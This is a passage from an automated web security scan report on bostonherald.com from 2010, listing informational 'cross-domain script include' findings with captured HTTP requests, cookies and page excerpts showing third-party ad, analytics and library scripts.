Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 404 Not Found
Date: Mon, 08 Nov 2010 03:16:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.154. http://bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

Response

9.155. http://bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /search/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:06:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.156. http://bostonherald.com/shopping/half_price_boston/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/shopping/half_price_boston/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://edge.quantserve.com/quant.js

Request

GET /shopping/half_price_boston/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

9.157. http://bostonherald.com/sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /sports/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:54:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 114415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.158. http://bostonherald.com/sports/baseball/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/baseball/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js

Request

GET /sports/baseball/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:55:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.159. http://bostonherald.com/sports/baseball/red_sox/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/baseball/red_sox/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.160. http://bostonherald.com/sports/baseball/red_sox/view/20101107adrian_gonzalez_fit_for_red_sox_eventually/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/baseball/red_sox/view/20101107adrian_gonzalez_fit_for_red_sox_eventually/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/baseball/red_sox/view/20101107adrian_gonzalez_fit_for_red_sox_eventually/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:17:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.161. http://bostonherald.com/sports/basketball/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/basketball/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js
http://www.sportsnetwork.com/aspdata/clients/herald/nbaministandings.aspx?id=092
http://www.sportsnetwork.com/aspdata/clients/herald/nbaschedule.aspx?id=092
http://www.sportsnetwork.com/aspdata/clients/herald/nbateamleaders.aspx?id=092

Request

GET /sports/basketball/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:56:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 74229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nbaschedule.aspx?id=092"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nbaministandings.aspx?id=092"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nbateamleaders.aspx?id=092"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.162. http://bostonherald.com/sports/college/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/college/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sports.ap.org/college-football/moduleif.ashx?mid=APPollModule&key=new&ap_poll_type=mypoll&width=315&mod_tpl=modulewidgets&mod_ii=true&mod_tracker=true&ap_code=cj120705K&height=475

Request

GET /sports/college/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:00:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 72093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>


<script src="http://sports.ap.org/college-football/moduleif.ashx?mid=APPollModule&key=new&ap_poll_type=mypoll&width=315&mod_tpl=modulewidgets&mod_ii=true&mod_tracker=true&ap_code=cj120705K&height=475"
type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.163. http://bostonherald.com/sports/columnists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/columnists/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /sports/columnists/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:06:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 61665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.164. http://bostonherald.com/sports/columnists/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/columnists/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
